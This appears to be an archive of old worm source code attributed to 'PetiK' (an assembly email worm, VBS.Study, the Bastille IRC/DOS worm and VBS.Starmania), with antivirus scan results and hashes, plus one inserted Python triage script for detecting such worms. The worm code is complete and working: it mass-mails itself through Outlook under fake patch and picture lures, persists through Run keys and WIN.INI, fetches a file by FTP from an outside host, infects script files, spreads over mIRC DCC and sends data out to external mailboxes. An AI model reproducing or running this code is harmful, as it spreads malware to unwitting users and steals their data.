        db 'msg.To = AddListEntry.Address',0dh,0ah
        db 'msg.Subject = "The last patch for Internet Explorer"',0dh,0ah
        db 'm = "Date : " & date',0dh,0ah
        db 'm = m & vbCrLf & "A lot of virus and worms use a bug in Internet Explorer"',0dh,0ah
        db 'm = m & vbCrLf & "This patch allows you to correct this problem"',0dh,0ah
        db 'm = m & vbCrLf & ""',0dh,0ah
        db 'msg.Body = m',0dh,0ah
        db 'msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(1),"\ie042601.exe")',0dh,0ah
        db 'If msg.To <> "" Then',0dh,0ah
        db 'msg.Send',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'End If',0dh,0ah
        db 'Next',0dh,0ah
        db 'End if',0dh,0ah
        db 'End Sub',0dh,0ah
VBSTAILLE equ $-vbsd

batd:   db "@echo off",0dh,0ah
        db "if exist C:\WINDOWS\EMail.vbs start C:\WINDOWS\EMail.vbs",0dh,0ah
        db "if exist C:\WINDOW\EMail.vbs start C:\WINDOW\EMail.vbs",0dh,0ah
        db "if exist C:\WIN\EMail.vbs start C:\WIN\EMail.vbs",0dh,0ah
        db "if exist C:\WIN95\EMail.vbs start C:\WIN95\EMail.vbs",0dh,0ah
        db "if exist C:\WIN98\EMail.vbs start C:\WIN98\EMail.vbs",0dh,0ah
        db "if exist C:\WINDOWS.000\EMail.vbs start C:\WINDOWS.000\EMail.vbs",0dh,0ah
        db "if exist C:\WINDOWS.001\EMail.vbs start C:\WINDOWS.001\EMail.vbs",0dh,0ah
        db "start ftp -i -v -s:C:\Win.drv",00h
BATTAILLE equ $-batd

drvd:   db "open",0dh,0ah
        db "members.aol.com",0dh,0ah
        db "pentasm99",0dh,0ah
        db "lcd C:\",0dh,0ah
        db "bin",0dh,0ah
        db "get petik.bmp",0dh,0ah
        db "bye",0dh,0ah
        db "exit",00h
DRVTAILLE equ $-drvd

.code
DEBUT:
CACHE:  call GetCurrentProcessId        ; This hides the program
        push 01h                        ; in the task list
        push eax                        ; (CTRL+ALT+DEL)
        call RegisterServiceProcess

COPIE:  push 00h                        ; Copy the original file here
        call GetModuleHandleA           ; into the SYSTEM directory
        push 260                        ; under the name "ie042601.exe"
        push offset szOrig
        push eax
        call GetModuleFileNameA
        push 260
        push offset szCopie
        call GetSystemDirectoryA
        push offset Copie
        push offset szCopie
        call lstrcat
        push 00h
        push offset szCopie
        push offset szOrig
        call CopyFileA

WIN_INI:push 260                        ; So that it runs at every start-up,
        push offset szWinini            ; the file name is written into WIN.INI,
        call GetWindowsDirectoryA       ; section [windows], line "run":
        push offset Winini              ;   [windows]
        push offset szWinini            ;   run=%SysDir%\ie042601.exe
        call lstrcat
        push offset szWinini
        push offset szCopie
        push offset run
        push offset windows
        call WritePrivateProfileStringA

SCRIPT: push 00h                        ; Create the file C:\script.ini
        push FILE_ATTRIBUTE_NORMAL
        push CREATE_ALWAYS
        push 00h
        push FILE_SHARE_READ
        push GENERIC_WRITE
        push offset inifile
        call CreateFileA
        mov  [FileHandle],eax
        push 00h
        push offset octets
        push INITAILLE
        push offset inid
        push [FileHandle]
        call WriteFile
        push [FileHandle]
        call CloseHandle

        push 00h                        ; Copy this file into the following
        push offset script1             ; directories: C:\MIRC
        push offset inifile
        call CopyFileA
        push 00h                        ; and C:\MIRC32
        push offset script2
        push offset inifile
        call CopyFileA
        push offset inifile
        call DeleteFileA

EMAIL:  push 260                        ; Create the file EMail.vbs in the
        push offset szVBS               ; default WINDOWS directory as "read-only".
        call GetWindowsDirectoryA
        push offset vbsfile
        push offset szVBS
        call lstrcat
        push 00h
        push FILE_ATTRIBUTE_READONLY
        push CREATE_ALWAYS
        push 00h
        push FILE_SHARE_READ
        push GENERIC_WRITE
        push offset szVBS
        call CreateFileA
        mov  [FileHandle],eax
        push 00h
        push offset octets
        push VBSTAILLE
        push offset vbsd
        push [FileHandle]
        call WriteFile
        push [FileHandle]
        call CloseHandle

FTP:    push 00h                        ; Create the file C:\Win.drv
        push FILE_ATTRIBUTE_HIDDEN      ; as "hidden"
        push CREATE_ALWAYS
        push 00h
        push FILE_SHARE_READ
        push GENERIC_WRITE
        push offset drvfile
        call CreateFileA
        mov  [FileHandle],eax
        push 00h
        push offset octets
        push DRVTAILLE
        push offset drvd
        push [FileHandle]
        call WriteFile
        push [FileHandle]
        call CloseHandle

EXEC:   push 260                        ; Create the file WSOCK32.BAT in "WINDOWS"
        push offset szBAT
        call GetWindowsDirectoryA
        push offset batfile
        push offset szBAT
        call lstrcat
        push 00h
        push FILE_ATTRIBUTE_NORMAL
        push CREATE_ALWAYS
        push 00h
        push FILE_SHARE_READ
        push GENERIC_WRITE
        push offset szBAT
        call CreateFileA
        mov  [FileHandle],eax
        push 00h
        push offset octets
        push BATTAILLE
        push offset batd
        push [FileHandle]
        call WriteFile
        push [FileHandle]
        call CloseHandle
        jmp  CONNECT

PAUSE:  push 15 * 1 * 1000              ; Wait 3 minutes,
        call Sleep                      ; then try again.

CONNECT:push offset yahoo               ; Check whether the IP address of
        call gethostbyname              ; www.yahoo.fr can be obtained.
        test eax,eax                    ; YES => continue.
        jz   PAUSE                      ; NO  => pause again.

BAT:    push 01h                        ; Run the file
        push offset batfile
        call WinExec

ATTEND: push 30 * 1 * 1000              ; Pause for 30 seconds,
        call Sleep                      ; then continue.

BDR:    push offset RegHandle           ; Look for the subkey "Control Panel\Desktop"
        push KEY_SET_VALUE
        push 00h
        push offset SOUS_CLE
        push HKEY_CURRENT_USER
        call RegOpenKeyExA
        push 02h
        push offset TWP_D
        push offset REG_SZ
        push 00h
        push offset TWP_S
        push [RegHandle]
        call RegSetValueExA
        push 02h
        push offset WPS_D
        push offset REG_SZ
        push 00h
        push offset WPS_S
        push [RegHandle]
        call RegSetValueExA
        push 00h                        ; Set "C:\petik.bmp" as the wallpaper
        push offset bmpfile
        push 00h
        push SPI_SETDESKWALLPAPER
        call SystemParametersInfoA
        push 00h
        call RegCloseKey

DOSSIER:push 260                        ; Go to the WINDOWS directory.
        push offset DIR                 ; (GetCurrentDirectoryA or
        call GetWindowsDirectoryA       ; GetSystemDirectoryA would also do)
        push offset DIR                 ; We are there. Load it.
        call SetCurrentDirectoryA

FFF:    push offset CHERCHE             ; Use the WIN32 file info structure
        push offset FICHIER             ; Take the extension we want (here *.txt)
        call FindFirstFileA             ; Look for the first file
        mov  edi,eax
        cmp  eax,-1                     ; If nothing is found => -1, jump to label FIN
        je   FIN

MODIF:  push 02h                        ; Change the attribute of the file that was
        push offset CHERCHE.FileName    ; opened. Give it the hidden attribute (02h)
        call SetFileAttributesA         ; and read-only (01h)

FNF:    push offset CHERCHE             ; Look for the other files
        push edi
        call FindNextFileA
        or   eax,eax                    ; If none is found, jump to label FIN
        jnz  MODIF                      ; otherwise go back to label MODIF

FC:     push offset SearchHandle        ; Close the search session
        call FindClose

FIN:    push 00h                        ; END OF PROGRAM
        call ExitProcess

signature db "I-WORM.PetiK",00h

end DEBUT

File PetiK.exe received on 05.16.2009 19:29:07 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result: Email-Worm.Win32.Petik!IK Win32/PetTick.8192.B Worm/Petik.20 Worm/Win32.Win32 W32/Malware!456d IRC:Generic-008 I-Worm/Petik Generic.Malware.IMg.66DE667B I-Worm.Petik Worm.Win32.Petik.A Win32.Petik.8192 Win32.WormPetik Win32/Buggy.8192 W32/Malware!456d Email-Worm.Win32.Petik W32/PetTick.C@mm Generic.Malware.IMg.66DE667B Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.20 Worm:Win32/Iepatch.A@mm Win32/Petik.A W32/Pet_Tick.8192.B Worm/W32.Petik.8192 W32/IEPatch BAT.Petik.A Worm.Mail.Petik.p W32/Petik Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.C Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.8192.B BAT.Petik.A

Additional information
File size: 8192 bytes
MD5: 61ed2fc0c60eac81856e07055621b5aa
SHA1: f172dd91c6e866ad0dfdafd9ea8d6412cf66c42e


Name : VBS.Study
Author : PetiK
Language : VBS
Date : 15/02/2001

'VBS/Study by PetiK ©2001.
'Thanks to FireBurn, Melissa, Monopoly and Prolin
'This program is used to study the propagation of worms.
' It spreads itself with 4 different Subjects, Bodies and Attached files.
' It sends the country of the infected computer to Panda34@caramail.com.
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set O = CreateObject("Outlook.application")
Set mapi = O.GetNameSpace("MAPI")
For Each AddList In mapi.AddressLists
  If AddList.AddressEntries.Count <> 0 Then
    For AddListCount = 1 To AddList.AddressEntries.Count
      Set AddListEntry = AddList.AddressEntries(AddListCount)
      Set msg = O.CreateItem(0)
      msg.To = AddListEntry.Address
      Randomize
      Num = Int((4*Rnd)+1)
      Set c = fso.GetFile(WScript.ScriptFullName)
      If num = 1 Then
        c.Copy(fso.GetSpecialFolder(0)&"\MyGirlfriend_NUDE.jpg.vbs")
        msg.Subject = "Hi, how are you ?"
        msg.Body = "Hi, look at this nice Pic attached !"
        msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MyGirlfriend_NUDE.jpg.vbs")
      elseif num = 2 Then
        c.Copy(fso.GetSpecialFolder(0)&"\Winword.doc.vbs")
        msg.Subject = "Important Message"
        msg.Body = vbCrLf & "Here is that document you asked"
        msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"Winword.doc.vbs")
      elseif num = 3 Then
        c.Copy(fso.GetSpecialFolder(0)&"\MONOPOLY.VBS")
        msg.Subject = "Bill Gates joke"
        msg.Body = "Bill Gates is guitly of monopoly. Here is the proof. :-)"
        msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MONOPOLY.VBS")
      elseif num = 4 Then
        c.Copy(fso.GetSpecialFolder(0)&"\CREATIVE.exe.vbs")
        msg.Subject = "A great Shockwave flash movie"
        msg.Body = "Check out this new flash movie that I download just now... It's Great."
        msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"CREATIVE.exe.vbs")
      End If
      If msg.To <> "" Then
        msg.Send
      End If
    Next
  End If
Next
Set msg2 = O.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com"
PAYS = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
msg2.Subject = "VBS/Study arrivant de " & PAYS
msg2.Send
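The VBScript mailers above (PetiK.A, ShowVar, VBS.Study) share a small set of static traits: the script reads its own body through WScript.ScriptFullName, walks Outlook's MAPI address lists, ships itself as an attachment or as a <SCRIPT> inside HtmlBody, writes a Run key, swaps the .VBS icon, and hides "dcc" behind chr() concatenation. The triage routine below is an added example, not PetiK's code; the indicator names are its own and the two script fragments are constructed, non-functional samples.

```python
"""Static triage of a VBScript source for the traits shared by the script
worms in this archive. Added example, not part of the original archive."""
from __future__ import annotations
import re


def decode_chr_concat(src: str) -> str:
    """Fold chr(NN) pieces and string concatenation back into literals so that
    "/." & chr(100) & chr(99) & chr(99) & " send" is seen as "/.dcc send"."""
    s = re.sub(r"chr\((\d+)\)", lambda m: '"' + chr(int(m.group(1))) + '"',
               src, flags=re.IGNORECASE)
    return re.sub(r'"\s*&\s*"', "", s)


# indicator name (this example's own) -> regex over the lower-cased, de-obfuscated source
INDICATORS = {
    "self_read": r"(opentextfile|getfile)\s*\(\s*wscript\.scriptfullname",
    "outlook_automation": r'createobject\s*\(\s*"outlook\.application"',
    "address_book_harvest": r"\.addresslists\b|\.addressentries\b",
    "attachment_or_script_body": r"attachments\.add\b|htmlbody\s*=",
    "registry_write": r"\bregwrite\b",
    "run_key_path": r"currentversion\\run(services)?\\",
    "vbs_icon_swap": r"vbsfile\\defaulticon",
    "irc_dcc_dropper": r"\bdcc\s+t?send\s+\$nick",
}


def assess(src: str) -> dict:
    """Return the matched indicators plus two derived verdicts."""
    s = decode_chr_concat(src).lower()
    hits = {name for name, rx in INDICATORS.items() if re.search(rx, s)}
    mailer_core = {"self_read", "outlook_automation", "address_book_harvest"}
    return {
        "indicators": sorted(hits),
        # reads itself + harvests the address book + puts code into the mail
        "self_replicating_mailer": mailer_core <= hits
                                   and "attachment_or_script_body" in hits,
        # writes the registry and names a Run/RunServices key
        "run_key_persistence": {"registry_write", "run_key_path"} <= hits,
    }


# --- constructed fragments: only the indicative lines, not runnable VBScript ---
WORM_LIKE = r'''
Set f=CreateObject("Scripting.FileSystemObject")
Set w=CreateObject("WScript.Shell")
Set file=f.OpenTextFile(WScript.ScriptFullName,1)
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Hwinfo")
w.RegWrite run,(f.GetSpecialFolder(0)&"\Hwinfo.vbs")
Set O=CreateObject("Outlook.Application")
For Each AddList In O.GetNameSpace("MAPI").AddressLists
msg.Attachments.Add WScript.ScriptFullName
Next
s.WriteLine "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & WScript.ScriptFullName
'''
BENIGN_MAILER = r'''
Set O=CreateObject("Outlook.Application")
Set msg=O.CreateItem(0)
msg.To="helpdesk@example.invalid"
msg.Subject="Nightly backup report"
msg.Body="Backup finished without errors"
msg.Send
'''

if __name__ == "__main__":
    for name, frag in [("worm-like", WORM_LIKE), ("benign", BENIGN_MAILER)]:
        print(name, assess(frag))
```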

File Study.vbs received on 05.11.2009 07:14:06 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.00.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 None 2009.5.11.1728 4.6.5.0
Last Update: 2009.05.11 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.10 2009.05.11 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.10
Result: Email-Worm.Win32.Petik!IK VBS/Petik Worm/Petik.B1 Worm/Win32.Win32 VBS/Petik.G@mm VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.AE9B1AEA VBS/Petik.G Worm.Win32.Email-Worm.Petik modification of VBS.Petik VBS/Buggy VBS/Petik.G@mm Email-Worm.Win32.Petik VBS/Petik.G@mm Generic.ScriptWorm.AE9B1AEA Email-Worm.Win32.Petik Email-Worm.Win32.Petik VBS/Generic Worm.Petik.B1 Virus:VBS/Petik.H probably unknown SCRIPT VBS/GenMail.C VBS.Petik.H@mm VBS/Generic.worm VBS.Petik.H VBS.Worm.Spam.Brief VBS/Petik-I Trojan Horse VBS_GENERIC.009 VBS.Worm-Family VBS.Petik.H

Additional information
File size: 2033 bytes
MD5: f41a964a3cb2ad29bcee1ce95163c7a9
SHA1: 5b003c80a78b61e702f80e83bb77cffff4678d8b

;Bastille Virus/Worm by PetiK, 23/04/2001
.model small
.code
org 100h

DEBUT:
OUVRE_AUTO:
        mov  ax,3D01h
        lea  dx,FILE
        int  21h
        xchg ax,bx
        xor  cx,cx
        mov  dx,cx
        mov  ax,4202h
        int  21h
        mov  cx,AUTOL
        lea  dx,DAUTO
        mov  ah,40h
        int  21h
        mov  ah,3Eh
        int  21h

COPIE_VIRUS:
        mov  ah,3Ch
        xor  cx,cx
        lea  dx,COPIE
        int  21h
        xchg ax,bx
        mov  ah,40h
        mov  cx,offset VRAIFIN - offset DEBUT
        lea  dx,DEBUT
        int  21h
        mov  ah,3Eh
        int  21h

MIRC:
        mov  ah,3Ch
        xor  cx,cx
        lea  dx,MIRCF1
        int  21h
        xchg ax,bx
        mov  cx,MIRCL
        lea  dx,DMIRC
        mov  ah,40h
        int  21h
        mov  ah,3Eh
        int  21h
        mov  ah,41h
        mov  dx,offset MIRCF2
        int  21h
        mov  ah,56h
        mov  dx,offset MIRCF1
        mov  di,offset MIRCF2
        int  21h
        mov  ah,41h
        mov  dx,offset MIRCF1
        int  21h

DATE:
        mov  ah,2Bh
        int  21h
        mov  dh,7
        mov  dl,14
        mov  cx,2001
        int  21h

HEURE:
        mov  ah,2Dh
        int  21h
        mov  cx,0A00h
        xor  dx,dx
        int  21h

FIN:
        mov  ah,4Ch
        int  21h

FILE    db 'C:\Autoexec.bat',00h
MIRCF1  db 'C:\script.ini',00h
MIRCF2  db 'C:\mirc\script.ini',00h
COPIE   db 'C:\Win32.com',00h
WHO     db 'Bastille Virus/Worm by PetiK (c)2001',00h

DAUTO:  db '',0dh,0ah
        db '@echo off',0dh,0ah
        db 'cls',0dh,0ah
        db 'echo You''re infected by Bastille Virus (c)2001',0dh,0ah
        db 'echo.',0dh,0ah
        db 'echo Don''t panic ! It''s not dangerous, just fatal !!',0dh,0ah
        db 'pause'
AUTOL   equ $-DAUTO

DMIRC:  db '[script]',0dh,0ah
        db 'n0=on 1:start:{',0dh,0ah
        db 'n1= .sreq ignore',0dh,0ah
        db 'n2=}',0dh,0ah
        db 'n3=on 1:connect:/rename C:\Win32.com C:\Bastille.com',0dh,0ah
        db 'n4=on 1:join:#:{',0dh,0ah
        db 'n5=if ($nick != $me) { dcc send $nick C:\Bastille.com }',0dh,0ah
        db 'n6=}',0dh,0ah
        db 'n7=on 1:disconnect:/rename C:\Bastille.com C:\Win32.com'
MIRCL   equ $-DMIRC

VRAIFIN:
end DEBUT

File Bastille.com received on 05.16.2009 10:45:35 (CET)
Antivirus: a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version: 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update: 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15
Result: IRC-Worm.DOS.Petik.a!IK Worm/Pestil Worm/Petik.Basti.1 Worm/DOS.Petik IRC/Mircworm.AC Bastille-803 IRC-Worm/Pestil.A IRC-Worm.Bastille.A Worm.IRC.Petik.A IRC.Petik MIRC/Generic Heuristic-1 IRC-Worm.DOS.Petik.a Petik.C IRC-Worm.Bastille.A IRC-Worm.DOS.Petik.a IRC-Worm.DOS.Petik.a IRC/Pestil IRC/Pestil Worm.Petik.Basti.1 Worm:DOS/Pestil Petik DOS/Virus.gen W32/Petik Bastille.A DOSCOM.Virus.IRC-Worm.petik Petik IRC.Worm.gen IRC_PETIK.C Bastille.A

Additional information
File size: 858 bytes
MD5...: d35715e97081f71ca4df20ad03bc0341
SHA1..: 2c3b51c4a6e0fb54c3ab66446dcce7d5ed61b5de

' Name   : VBS.Starmania.A
' Author : PetiK
' Date   : May 09th 2001
' Size   : 4566 bytes
' Action : It copies itself to %windir%\Hwinfo.vbs and to %systemroot%\Issetup.vbs.
'          It adds two values: the first in the Run key and the second in the RunServices
'          key. Then it infects all *.vbs and *.vbe files in different folders:
'
'          C:\WINDOWS               \
'          C:\WINDOWS\SYSTEM         |
'          C:\WINDOWS\TEMP           |_
'          C:\WINDOWS\SAMPLES\WSH    |- All those names are the defaults
'          C:\WINDOWS\DESKTOP        |
'          C:\MY DOCUMENTS          /
'
'          The virus adds its code at the start of the file.
'
'          After that it creates a script.ini file in the C:\mirc folder. When the current day is
'          the 15th, the worm displays a message, changes the RegisteredOwner and Registered
'          Organization to "Starmania" and "PetiK Corpor@tion" and adds some values to
'          display a message when the computer starts. Every day it changes the Start Page
'          of Internet Explorer to one of five different addresses:
'
'          http://www.symantec.com
'          http://www.pandasoftware.com
'          http://www.avp.ch
'          http://www.cia.gov
'          http://www.fbi.gov
'
'          At the end, it spreads with Outlook. There are three different subjects, bodies
'          and attachments:
'
' First  : Subject  : New Picture for you !
'          Body     : Look at this nice picture attached
'          Attached : NewPic__Cool.jpg.vbs
'
' Second : Subject  : LoveLetter Fix
'          Body     : Protect you against VBS.LoveLetter.Variant
'          Attached : LoveFix.vbs
'
' Third  : Subject  : How to win a holiday in Paris
'          Body     : Play at this game attached and win a holiday in Paris
'          Attached : Win_A_Holiday.vbs
'
' #-------------------- START OF CODE --------------------#

'VBS.Starmania
'Coded by PetiK on 09/05/2001
'Made In France
On Error Resume Next
Dim f,w,file
Set f=CreateObject("Scripting.FileSystemObject")
Set w=CreateObject("WScript.Shell")
Set file=f.OpenTextFile(WScript.ScriptFullName,1)
vbsworm=file.ReadAll
START()

Sub START()
Set win=f.GetSpecialFolder(0)
Set sys=f.GetSpecialFolder(1)
Set cop=f.GetFile(WScript.ScriptFullName)
cop.Copy(win&"\Hwinfo.vbs")
cop.Copy(sys&"\Issetup.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Hwinfo")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Issetup")
w.RegWrite run,(win&"\Hwinfo.vbs")
w.RegWrite runs,(sys&"\Issetup.vbs")
MD=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders\Personal")
ptk(win)
ptk(sys)
ptk(f.GetSpecialFolder(2))
ptk(win&"\Samples\Wsh")
ptk(win&"\Desktop")
ptk(MD)
Worm ""
Mess()
Raffle()
Email()
End Sub

Function ptk(Folder)
If f.FolderExists(Folder) then
 For each P in f.GetFolder(Folder).Files
  ext=f.GetExtensionName(P.Name)
  If ext="vbs" or ext="vbe" Then
   Set VF=f.OpenTextFile(P.path, 1)
   mark=VF.Read(14)
   VF.Close
   If mark <> "'VBS.Starmania" Then
    Set VF=f.OpenTextFile(P.path, 1)
    VC=VF.ReadAll
    VF.Close
    VCd=vbsworm & VC
    Set VF=f.OpenTextFile(P.path,2,True)
    VF.Write VCd
    VF.Close
   End If
  End If
 Next
End If
End Function

Function Worm(Path)
If Path = "" Then
 prgfl=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
 If f.FileExists("C:\mirc\mirc.ini") Then Path = "C:\mirc"
 If f.FileExists(prgfl & "\mirc\mirc.ini") Then Path = prgfl & "\mirc"
 If f.FileExists("C:\mirc32\mirc.ini") Then Path = "C:\mirc32"
 If f.FileExists(prgfl & "\mirc32\mirc.ini") Then Path = prgfl & "\mirc32"
End If
If Path <> "" Then
 Set mirc=f.CreateTextFile(Path & "\script.ini", True)
 mirc.WriteLine "[script]"
 mirc.WriteLine "n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } "
 mirc.WriteLine "n1= /dcc send $nick " & f.GetSpecialFolder(0) &"\Hwinfo.vbs"
 mirc.WriteLine "n2=}"
End If
End Function

Sub Mess()
If Day(Now) = 15 Then
 w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StarMania","rundll32 mouse,disable"
 w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","How are you today ? For my part, I'm fine"
 w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","VBS.Starmania"
 w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Starmania"
 w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization","PetiK Corpor@tion"
 MsgBox "Hi man, it's my new Worm/Virus. It was coded by PetiK in 2001", vbinformation, "VBS.Starmania"
End If
End Sub

Sub Raffle()
Randomize
lot=Int((5*Rnd)+1)
If lot = 1 Then
 w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.symantec.com"
elseif lot = 2 Then
 w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.pandasoftware.com"
elseif lot = 3 Then
 w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"
elseif lot = 4 Then
 w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cia.gov"
elseif lot = 5 Then
 w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.fbi.gov"
End If
End Sub

Sub Email()
Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
 If AL.AddressEntries.Count <> 0 Then
  For AddListCount = 1 To AL.AddressEntries.Count
   Set ALE = AL.AddressEntries(AddListCount)
   Set go = O.CreateItem(0)
   go.To = ALE.Address
   Randomize
   num=Int((3*Rnd)+1)
   Set c = f.GetFile(WScript.ScriptFullName)
   If num = 1 then
    c.Copy(fso.GetSpecialFolder(0)&"\NewPic__Cool.jpg.vbs")
    go.Subject = "New Picture for you !"
    go.Body = "Look at this nice picture attached"
    go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"NewPic__Cool.jpg.vbs")
   elseif num = 2 then
    c.Copy(fso.GetSpecialFolder(0)&"\LoveFix.vbs")
    go.Subject = "LoveLetter Fix"
    go.Body = "Protect you against VBS.LoveLetter.Variant"
    go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"LoveFix.vbs")
   elseif num = 3 then
    c.Copy(fso.GetSpecialFolder(0)&"\Win_A_Holiday.vbs")
    go.Subject = "How to win a holiday in Paris"
    go.Body = "Play at this game attached and win a holiday in Paris"
    go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Win_A_Holiday.vbs")
   End If
   If go.To <> "" Then
    go.Send
   End If
  Next
 End If
Next
End Sub
'#-------------------- END OF CODE --------------------#

